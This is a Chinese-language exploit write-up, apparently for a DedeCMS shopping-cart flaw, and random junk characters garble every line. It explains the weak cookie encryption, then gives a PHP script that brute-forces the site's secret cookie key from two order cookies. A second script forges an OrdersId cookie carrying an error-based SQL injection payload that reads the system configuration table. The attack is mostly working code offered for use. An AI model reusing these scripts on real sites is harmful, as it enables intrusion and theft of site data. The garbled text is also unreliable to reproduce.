www.xxx.com/plus/search.php?keyword=. `1 i9 `' j" a( }( ~% U
在 include/shopcar.class.php中, B$ G& H/ j4 |4 }! g8 {
先看一下这个shopcar类是如何生成cookie的
: M! k7 g0 }3 A0 S239 function saveCookie($key,$value)" p+ r+ t. ?4 b+ K0 C/ V
240 {. d0 q+ X7 b% d! l# j3 V+ C7 \: a
241 if(is_array($value))# z+ K% A6 V- m+ v! G- g6 e
242 {; K+ u" K( ~, r! Y. R0 b) N
243 $value = $this->enCrypt($this->enCode($value));; \% c) Y+ M2 B6 c+ B) U
244 }2 B% S6 o J: f, E2 {9 N
245 else
0 |$ s: y/ \5 I1 Y2 {- |- \% {- @246 {1 ^& Y0 t! J1 V: T# y8 b7 r
247 $value = $this->enCrypt($value);
0 |. a( r* [5 e* r. T) O5 B/ h248 }5 `' ^* W' [- n: I
249 setcookie($key,$value,time()+36000,’/');
. N% o5 C, O! j% Z: Z6 B250 }
3 I! H3 q; n) _简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
7 \0 D- i" R9 z! M( [186 function enCrypt($txt)4 C$ r7 I( q/ ` b2 d8 g2 c4 u
187 {
& S5 t c5 g5 H# l+ o188 srand((double)microtime() * 1000000);9 N! k+ Q5 E e+ S! u5 `# \, W. Q) z
189 $encrypt_key = md5(rand(0, 32000));
+ M$ m( V0 W. P( j4 U190 $ctr = 0;( F8 @: ?# Y9 r0 K
191 $tmp = ”;# m0 T; C; L' O* F& g
192 for($i = 0; $i < strlen($txt); $i++): ?6 l$ h$ R$ m7 p9 e/ P0 H/ t I/ q
193 {
/ k/ r$ t: D# p194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
# _1 T4 l+ l0 x6 z195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
. e5 g4 T$ a# h8 M0 X196 }
( g m; e6 m$ V& h' ?197 return base64_encode($this->setKey($tmp));; u7 p6 S1 e6 ]; V9 u" d
198 }& ?5 y6 U5 }- M" q
213 function setKey($txt)) N* Q- C0 ~# s% o
214 {/ Q0 E3 ^7 n" P8 n5 d$ R% X# T
215 global $cfg_cookie_encode;
# q: i7 k% p' N5 h( {216 $encrypt_key = md5(strtolower($cfg_cookie_encode));+ Z1 o9 w( }8 U+ Q9 f
217 $ctr = 0; N% N& h, e* T
218 $tmp = ”;# U# {' T x9 J! h( ]
219 for($i = 0; $i < strlen($txt); $i++)9 r0 I9 f _& @5 P3 e' Z
220 {
" S9 ]' o! L1 N( _' J, e$ D221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;' N0 a+ j- L4 i2 \2 p$ @) C; ?
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
5 p- A; w$ p9 e$ _" b& @7 x223 }. _/ E" n6 N" v8 u+ g1 ~
224 return $tmp;; P: I ?5 b" N2 N& \5 f$ g* h
225 }
0 O6 b( y2 {8 p9 [" T% n! F P! ^: XenCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的9 y+ R0 E8 H& U& u
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
: E$ U. I- ^' S; u5 k具体代码如下:
2 ?0 M/ O& p4 l<?php3 k$ c" ~! e: n' Y9 G
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
7 X0 T; q8 ~8 o- [4 I8 ^& x. {: \$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here: Y/ d. a, a8 N) \# f
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
1 E* e( L% z* I6 C% a9 m& kfunction reStrCode($code,$string)8 f, j; N; t0 m; I6 H
{
c; G9 g+ a8 x* X1 u# x; \5 V5 C: W$code = base64_decode($code);# l0 l! C7 R3 T$ K( f' l
$key = “”;
/ V' O+ _/ z! B- O$ T# v: ofor($i=0 ; $i<32 ; $i++)
- j. M1 w: C3 r; _1 F6 p$ L{, d5 x7 W9 e P5 F
$key .= $string[$i] ^ $code[$i];8 W4 `+ j! z6 v, G
}& s h! c; R' L+ Q" |! Z; u
return $key;
" @' x8 S" A2 v2 e}
8 N! B- q1 k. F( `function getKeys($cookie,$plantxt)$ x4 l) u/ D3 w- U
{
) Z+ G0 f9 i+ n+ ?& w9 g" O$tmp = $cookie;3 @7 ?. H0 Q/ @: e5 J# M. K
$results = array();
5 W: x1 ]% P$ d3 Ifor($j=0 ; $j < 32000; $j++)
( ?, l2 Z8 C: I1 u) D5 i{$ P7 k( e" h9 p8 r% T
( n! p3 W: W( b: f E1 C$txt = $plantxt;
5 ?0 b9 \- T1 v/ R7 P8 N$ctr = 0;
. ?4 Q6 R& [. s9 t6 b2 _: Q" h5 b) b$tmp = ”;7 g* z. k0 `+ U& i3 x' i& x& x
$encrypt_key = md5($j);
' v# }4 N- q' G/ e# I3 b$ jfor($i =0; $i < strlen($txt); $i ++)' D i' o& B, O2 L2 r/ v' i
{) s# g7 h% _9 v0 V( K
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
& G" N, _4 C4 d! v& L6 E7 \$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);! F( d/ A. a4 S) e3 S) B w& z
}
1 u4 y; Z: J4 l% q% I$string = $tmp;
4 Y8 g- ~% q& t% F3 z$code = $cookie;
* S8 w0 Q* O; J' h T6 N# R% C$result = reStrCode($code,$string);
' h" o. r6 _# O; v. B$ ^& Iif(eregi(‘^[a-z0-9]+$’,$result))7 \0 H" w$ C3 Y' u1 ~- G
{5 m4 g$ ^+ G1 @* {7 v
echo $result.”\n”;
2 P9 A3 @( k( d4 t$results[] = $result;' d5 t7 j D9 i3 z& W
}. \) c$ s1 ?& ]. Q: F c; D
}# f, Y# Y N: _( L
return $results;
+ [# S- {, B1 j}7 E8 w3 `7 D1 e0 _
$results1 = getKeys($cookie1,$plantxt);4 O3 l8 T2 N+ u9 A$ {, ~) F
$results2 = getKeys($cookie2,$plantxt);) [& L2 h5 n4 E I
print “\n——————–real key————————–\n”;# c9 x$ `. u+ O6 |) C
foreach($results1 as $test1)
3 \- _) g3 V, f; U+ K{
, |; h8 n3 x3 p9 L3 ~foreach($results2 as $test2)4 K, N3 M. T8 w1 n! _+ G2 k, b
{
8 l' Q# O1 V$ ]4 dif($test1 == $test2)6 _& t) d5 D* O4 a9 y
{
8 ]5 Y, W: p9 E H- zecho $test1.”\n”;
! X7 G1 l4 |# c; h# W! R. ~. K; D}) f9 W, k! s0 x8 P: l( ]
}
% K0 X, S8 T+ a' W6 r}
+ s: v" [# I0 b6 E# L2 ??>; y1 ~4 p c3 a7 O3 _4 g2 j8 Q4 m
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
# H% N1 E9 y$ u# l8 c# gplantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
3 E2 B8 R/ m0 x5 S* \" ]: P然后推算出md5(strtolower($cfg_cookie_encode))
3 l5 z, y s7 X- p得到这个key之后,我们就可以构造任意购物车的cookie* N* Q' I! u; j- }- x$ x
接着看2 C M4 q' C4 t+ L! x
20 class MemberShops1 z9 g7 K8 n% ]
21 {1 _) t, X" L' F: J _
22 var $OrdersId;( B1 z2 s2 ~% B
23 var $productsId;
" n' R9 _9 b+ F& V24% |9 Q2 K6 ~/ H( C& U
25 function __construct()1 U+ M$ ]) Z% P7 K( N
26 {
/ @7 e3 P/ X( v/ `# A+ o27 $this->OrdersId = $this->getCookie(“OrdersId”);
5 W, W* P y* ?0 ~ e, d- |28 if(empty($this->OrdersId))7 ] W" L% e& H3 @, j& c
29 {, y, b, `5 P" n7 h2 ?+ e
30 $this->OrdersId = $this->MakeOrders();
3 o3 T7 D' W& F# l) i31 }/ k0 K0 \( q& k+ l3 @
32 }5 v+ }0 L( F5 A' d( s9 r0 c
发现OrderId是从cookie里面获取的& N$ g' G2 g9 n9 b7 D) m2 I0 H$ l
然后
" G4 _5 \8 z' M2 j% r/ z) o3 j/plus/carbuyaction.php中的5 n, B7 W# ]% t/ W+ l- M
29 $cart = new MemberShops();
/ V0 R5 Y) n5 ^! S3 a. _: l39 $OrdersId = $cart->OrdersId; //本次记录的订单号
; m' y$ w7 L+ J: ?0 E: f9 y1 `……3 H+ V' _+ G2 R* m/ [' [( u8 a
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
4 Q6 C% `) i/ k K接着我们就可以注入了
# | q+ C& W$ K通过利用下面代码生成cookie:7 {, ?3 |: t1 ~6 @
<?php
9 G) |% A' [* q8 m+ C" n3 O$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
! t+ h' c% r! {; D( c- E$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here) q O/ d* o3 a# `2 F8 E
function setKey($txt)
- D+ B4 O; V& U+ L0 O$ W6 d{' N3 }, d+ T! V- j- G. Z( _! j
global $encrypt_key;7 s' Q6 a3 a" u8 \$ m; u; T
$ctr = 0;
( \% O8 o% j+ z% C$tmp = ”;" g( G* c- Q( E+ _4 h+ h2 C0 u
for($i = 0; $i < strlen($txt); $i++)% C- a& j0 C/ W6 P4 {+ S- _# Z" N
{5 c3 U& |2 a! l C
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
5 c/ m. `2 L8 R+ {. U f3 D$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
0 ~& _3 a! I4 f n; @3 e2 |}
. m4 R9 j( P" m& treturn $tmp;
; f3 m F. C) C! z. y. I& W}; r4 o# B4 ]/ E* h
function enCrypt($txt)
3 K* v/ q; ?- \1 ]1 l. H{
, W# _ C! ^' |/ h( i6 dsrand((double)microtime() * 1000000);
+ g5 Q0 h4 V$ R1 `* N- p$encrypt_key = md5(rand(0, 32000));
: J5 n/ _2 Q5 m& r* ?3 H$ctr = 0;
8 J. Y+ `' g0 O& Y. z# v# ~$tmp = ”;
# c: L+ A4 x$ `+ Bfor($i = 0; $i < strlen($txt); $i++)2 F3 ` a$ h; K) B6 t5 X# T
{
6 t3 m* f- ]! n! Q& O V6 l f$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;% u8 c: \8 t$ A, }$ Q$ G$ J& C
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
* e0 _+ B; D" m( [}/ B8 H8 M$ G* H$ V: M3 f: w
return base64_encode(setKey($tmp));9 T$ i4 `4 ^# N# E1 i8 i4 e
}8 Y3 z0 w6 j* @, {2 b u. l
for($dest =0;$dest = enCrypt($txt);)
5 Q* l7 t% p0 D2 ~; U{
: r/ M& Y( d% C5 b L1 r' f* {if(!strpos($dest,’+'))
4 Q- Y5 A' P6 H% `# X2 m, \( l{
4 w+ |7 i: P/ o6 H' q6 Pbreak;5 F* s6 u' Y& O- s
}
+ w. Q3 ~/ m$ q4 b+ W}
: m$ z; h) _6 O2 k; |0 zecho $dest.”\n”;; ^' h$ q, ` x: K
?>
7 K7 W* H# o8 l
, Q5 t! o. {4 H |